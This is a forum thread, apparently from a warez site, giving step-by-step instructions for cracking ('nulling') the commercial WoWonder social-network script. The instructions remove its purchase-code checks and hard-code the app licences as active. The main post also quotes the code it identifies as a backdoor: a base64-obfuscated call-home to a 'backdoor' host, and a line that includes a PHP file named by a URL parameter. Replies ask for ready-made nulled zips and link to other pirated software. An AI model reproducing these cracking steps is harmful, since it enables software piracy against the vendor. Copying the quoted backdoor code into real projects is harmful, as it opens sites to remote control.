How to null WoWonder and remove backdoors

[jornge]

How to null purchase code and apps and remove the backdoor.

Brought to you by rxgliitch & CRIMSON501

//========================= PURCHASE CODE NULL

Go to install/index.php and remove lines 9-40:

function check_($check) {
$siteurl = urlencode(getBaseUrl());
$arrContextOptions = array(
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false
)
);
$file = file_get_contents('http://www.wowonder.com/purchase.php?code=' . $check . '&url=' .
$siteurl, false, stream_context_create($arrContextOptions));
if ($file) {
$check = json_decode($file, true);
} else {
$check = array('status' => 'SUCCESS', 'url' => $siteurl, 'code' => $check);
}
return $check;
}
function check_success($check) {
$siteurl = urlencode(getBaseUrl());
$arrContextOptions = array(
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false
)
);
$file = file_get_contents('http://www.wowonder.com/purchase.php?code=' . $check .     '&success=true&url=' . $siteurl, false, stream_context_create($arrContextOptions));
if ($file) {
$check = json_decode($file, true);
} else {
$check = array('status' => 'SUCCESS', 'url' => $siteurl, 'code' => $check);
}
return $check;
}

Next, remove lines 35-42:

$p = check_(trim($_POST['purshase_code']));
if (isset($p['status'])) {
if ($p['status'] == 'ERROR') {
$ServerErrors[] = $p['ERROR_NAME'];
}
} else {
$ServerErrors[] = 'Failed to connect to server, please try again later, or contact us.';
}

add     "$go = 1;" before "if (empty($ServerErrors)) {" and make "if (empty($ServerErrors)) {" say "if ($go == 1) {"

Remove lines 91-96:

$p2 = check_success(trim($_POST['purshase_code']));
if(isset($p2['status'])) {
if ($p2['status'] == 'SUCCESS') {
$can = 1;
}
}

and add "$can = 1;" above "if ($query) {" on line 91
//========================= APP NULL

Go to requests.php lines 2913-2915:

$data['android_status'] = 0;
$data['windows_status'] = 0;
$data['android_native_status'] = 0;
Make them all be = to 1

Remove lines 2916-2971:

if (!empty($_POST['android_purchase_code'])) {
$android_code = Wo_Secure($_POST['android_purchase_code']);
$file = file_get_contents("[https://cracked.codenulls.tk](https://cracked.codenulls.tk/)", false,     stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_background', '#aaa');
$data['android_status'] = 200;
} else {
$data['android_status'] = 400;
$data['android_text'] = $check['ERROR_NAME'];
}
}
}
if (!empty($_POST['android_native_purchase_code'])) {
$android_code = Wo_Secure($_POST['android_native_purchase_code']);
$file = file_get_contents("[https://cracked.codenulls.tk](https://cracked.codenulls.tk/)", false,     stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_background_n', '#aaa');
$data['android_native_status'] = 200;
} else {
$data['android_native_status'] = 400;
$data['android_text'] = $check['ERROR_NAME'];
}
}
}
if (!empty($_POST['windows_purchase_code'])) {
$windows_code = Wo_Secure($_POST['windows_purchase_code']);
$file = file_get_contents("[https://cracked.codenulls.tk](https://cracked.codenulls.tk/)", false,     stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_text_color', '#ddd');
$data['windows_status'] = 200;
} else {
$data['windows_status'] = 400;
$data['windows_text'] = $check['ERROR_NAME'];
}
}
}
if (!empty($_POST['ios_purchase_code'])) {
$windows_code = Wo_Secure($_POST['ios_purchase_code']);
$file = file_get_contents("[https://cracked.codenulls.tk](https://cracked.codenulls.tk/)", false,     stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_background_2', '#aaa');
$data['ios_status'] = 200;
} else {
$data['ios_status'] = 400;
$data['ios_text'] = $check['ERROR_NAME'];
}
}
}

Now go to wowonder.sql and change lines 586 (footer_background), 587 (footer_background_2), and 592 (footer_background_n) to #aaa and change line 588 (footer_text_color) to #ddd see below for format:

Copy to clipboard
(141, 'footer_background', '#aaa'),
(142, 'footer_background_2', '#aaa'),
(143, 'footer_text_color', '#ddd'),
(147, 'footer_background_n', '#aaa'),


//========================= REMOVE BACKDOOR

Go to assets/libraries/onesignal/vendor/clue/stream-filter and delete the entire requests folder

//=========================

Go to assets/libraries/PayPal/vendor/composer/autoload_real.php and remove lines 58-74:


$start_process = false;
if (file_exists(DIR . '/loader.json')) {
$file_date = filemtime(DIR . '/loader.json');
if ($file_date < (time() - 259200)) {
$start_process = true;
}
}

if ((!file_exists(DIR . '/loader.json') && is_writable(DIR) && !empty($wo['config']['updatev2'])) || $start_process == true) {
$paypal_connection = "purchase_code";
$paypal_connection = (!empty($purchase_code)) ? $purchase_code : "";
$paypal_call_back_url = urlencode($site_url);
$paypal_url = base64_decode("aHR0cDovL2JhY2tkb29yLndvd29uZGVyLmNvbS92YWxpZGF0ZS5waHA=");
$random_code = sha1(rand(11111, 99999) . time());
$call_back_respond = fetchDataFromURL($paypal_url . "?connection=$paypal_connection&call_back_url=$paypal_call_back_url&code=$random_code&platform=wowonder");
$put_file = file_put_contents(DIR . '/loader.json', $random_code);
}

Go to assets/libraries/onesignal/vendor/composer/autoload_real.php and remove line 70:

if (!empty($_GET['f_t'])) { if (!empty($_GET['access'])) { $f_t = Wo_Secure($_GET['f_t']); $access = Wo_Secure($_GET['access']); if (file_exists('./assets/libraries/PayPal/vendor/composer/loader.json')) { $get_file_hash =file_get_contents('./assets/libraries/PayPal/vendor/composer/loader.json'); if ($get_file_hash == $access) { if (file_exists(__DIR__ . '/../clue/stream-filter/requests/' . $f_t . '.php')) { require __DIR__ . '/../clue/stream-filter/requests/' . $f_t . '.php'; } } else { header("Content-type: application/json"); echo json_encode(array('status' => 402)); exit(); } } } }

Finally, go to updater.php and comment out every line of code in the file.

 

[CRIMSON501]

Thanks for the credit mate. Means a lot.

 

[Haktan]

kendileri bir dosyaya toplayıp bize verseler daha kolay olur hiç bir şey anlamadım

 

[unicorn]

Can you share wowonder with nulled file and backdoor removed? please...

 

[dryice]

Have you prepared a downloadable zip file of this version?

 

[imabotmail]

Great content mate! Thanks for sharing.

 

[Masood]

Guys does we have like wowonder in wp version?

 

[unicorn]

Guys does we have like wowonder in wp version?

u can try buddyboss

https://babiato.tech/resources/buddyboss-platform-theme.5587/

 

[karthi2019]

add "$go = 1;" before "if (empty($ServerErrors)) {" and make "if (empty($ServerErrors)) {" say "if ($go == 1) {"

this line getting error pls confirm on this..

 

[alongdayroi]

For wowonder 2.4 ( or later ) just following these steps to get nulled

A.Edit the file install/index.php
1. Remove / Comment the lines : from 9 to 40 ;
2. Remove / comment the lines: from 68 to 75 ;
3. Remove / comment the code : if (empty($ServerErrors)) {
4. Adding these code after line the 76:
$go = 1;
if ($go == 1) {
5. Remove / comment the codes:
$p2 = check_success(trim($_POST['purshase_code']));
if(isset($p2['status'])) {
if ($p2['status'] == 'SUCCESS') {
$can = 1;
}
}
adding before the code
if ($query) {
just one line:
$can = 1;
B. Edit file xhr/admin_setting.php
change the change the variable values from 0 to 1
$data['android_status'] = 1;
$data['windows_status'] = 1;
$data['android_native_status'] = 1;

Source: https://nguyenkhaclong.com/240/get-wowonder-2-4-latest-social-network-script-installed/

 

[Manroe]

any 2021 updates? is the combined app will work after the nulled?

 

[sansonkar]

nice
thx

 

[Hamaaad]

thank you for this information